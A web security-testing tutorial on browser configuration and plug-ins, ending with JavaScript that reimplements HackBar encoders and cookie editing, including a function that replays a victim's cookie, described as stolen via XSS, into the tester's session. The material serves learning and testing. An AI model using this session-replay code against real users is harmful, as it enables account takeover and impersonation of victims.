Introduction to security testing
Different browsers ship different security features, so the same vulnerability can trigger different effects in different browsers. This is a cross-browser compatibility problem, and it is the reason a test environment should include more than one browser.
Recommended combination: Chrome + Firefox + IE
Change the browser's default security settings according to the needs of the test.
Security settings are changed through the browser's normal settings menu; no special tooling is needed.
The main changes are to allow JavaScript to run and to allow pop-up windows. During an XSS test, if JavaScript is disabled or pop-ups and dialogs are blocked, the payload may be silently intercepted by the browser and the tester may wrongly conclude that the page is not vulnerable.
Browser functions commonly used in security testing
- Clear the cache: Many web browsers remember passwords and keep the user logged in, so the user does not have to enter the password on every visit. For developing and testing a login page this is a nuisance: the browser has cached the user's login state, a single click logs in again, and the cached information can distort the test result. Clearing the browsing history (including cookies) resets this state.
- Incognito mode (private window): does not record cache information, traces of operations, browsing history or cookies, so every window starts from a clean session.
- View the webpage source code: right mouse button -> View page source, or prefix the address with view-source: in the URL bar (view-source:URL).
- Developer tools: shortcut key F12
- Locate a DOM element:
F12 -> click the small arrow (element picker) on the left side of the developer toolbar -> click an area on the page to jump to the corresponding element in the DOM tree.
For example, on the hacking challenge site www.hackthissite.org, use the picker on the login form to find the account and password input elements before constructing requests against them.
Getting browser plug-ins
Introduction to commonly used plug-ins:
- Hackbar:
Provides the ability to quickly construct HTTP requests (GET and POST with custom data) and to perform various encoding conversions.
However, Hackbar became a paid extension after version 2.1.3. If you have a copy, version 2.1.3 can still be used; otherwise I recommend Max HackBar (free), whose interface and functions are almost the same.
- Cookie Quick Manager:
Gives the browser the ability to quickly modify, add and delete cookies.
An XSS vulnerability can steal another user's credential information from the cookie (unless the cookie is marked HttpOnly, in which case the script cannot read it through document.cookie). The stolen values can then be added to the current session through the cookie manager's edit function, which makes the server treat the tester's browser as the victim's session.
Tips:
With these two plug-ins, Hackbar and Cookie Quick Manager, we can construct and forge most common requests.
- Proxy SwitchyOmega:
Used to set the browser proxy quickly; combined with a packet-capture (intercepting proxy) tool, it lets the browser's traffic be captured and modified.
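What the Hackbar and Cookie Quick Manager plug-ins above do through their UI, written out as plain JavaScript. This is an added example, not code from the original notes or from either plug-in: the encoders, the cookie merge that replays a stolen session and the form-POST builder are written here from scratch, and every URL, cookie name and cookie value is made up for illustration. It runs in the browser console (F12) or under Node.

```javascript
// Added example, not code from the original notes or from the plug-ins:
// HackBar's request builder / encoders and Cookie Quick Manager's cookie
// editing done by hand. Paste into the browser console (F12) or run under
// Node. Every URL, cookie name and value below is constructed for the demo.

// ---- Encoding conversions (what HackBar's encoding menu does) ----
function urlEncode(s) { return encodeURIComponent(s); }
function urlDecode(s) { return decodeURIComponent(s); }

// UTF-8 safe Base64; btoa() alone throws on characters outside Latin-1.
function base64Encode(s) {
  const bytes = new TextEncoder().encode(s);
  let bin = '';
  for (const b of bytes) bin += String.fromCharCode(b);
  return btoa(bin);
}
function base64Decode(s) {
  const bin = atob(s);
  const bytes = Uint8Array.from(bin, c => c.charCodeAt(0));
  return new TextDecoder().decode(bytes);
}

// Numeric HTML entities for the characters that matter in an XSS context.
function htmlEncode(s) {
  return s.replace(/[&<>"']/g, c => '&#' + c.charCodeAt(0) + ';');
}

// ---- Cookie handling (what Cookie Quick Manager does through its UI) ----
// "a=1; b=2" -> { a: '1', b: '2' }
function parseCookies(header) {
  const jar = {};
  for (const part of header.split(';')) {
    const idx = part.indexOf('=');
    if (idx < 0) continue;
    const name = part.slice(0, idx).trim();
    if (name) jar[name] = part.slice(idx + 1).trim();
  }
  return jar;
}
function serializeCookies(jar) {
  return Object.entries(jar).map(([k, v]) => `${k}=${v}`).join('; ');
}

// Merge cookies captured from a victim (e.g. document.cookie exfiltrated by an
// XSS payload) into the tester's current cookies. Captured values win, so the
// session cookie is replaced and the server now treats us as the victim.
function replaySession(currentHeader, capturedHeader) {
  return Object.assign(parseCookies(currentHeader), parseCookies(capturedHeader));
}

// Write a cookie jar into a document: the real `document` in the browser, or
// any object with a `cookie` setter when running under Node. Returns the
// strings written. HttpOnly cookies never appear in document.cookie, so an
// XSS payload cannot capture them in the first place.
function applyCookies(jar, doc = globalThis.document) {
  const written = [];
  for (const [k, v] of Object.entries(jar)) {
    const line = `${k}=${v}; path=/`;
    doc.cookie = line;
    written.push(line);
  }
  return written;
}

// ---- Request construction (what HackBar's "Post data" box does) ----
// Returns the pieces of a form POST; hand them to fetch() to actually send it.
function buildPostRequest(url, params, jar) {
  return {
    method: 'POST',
    url,
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded',
      'Cookie': serializeCookies(jar),
    },
    body: new URLSearchParams(params).toString(),
  };
}

// Demo with constructed values: our own session plus a captured victim cookie.
const mine   = 'PHPSESSID=mine123; lang=en';
const stolen = 'PHPSESSID=victim999';   // as an XSS payload would have sent it out
const jar    = replaySession(mine, stolen);
const req    = buildPostRequest('http://target.example/profile.php',
                                { action: 'view', id: '1' }, jar);
console.log(urlEncode('<script>alert(1)</script>'));
console.log(req);
```

In a real browser, `applyCookies(jar)` writes into `document.cookie` and the next navigation carries the victim's session, which is exactly the "add the stolen credential to the current session" step; under Node, pass an object with a `cookie` setter instead. `buildPostRequest` only assembles the request so the example runs offline; `fetch(req.url, { method: req.method, headers: req.headers, body: req.body })` sends it.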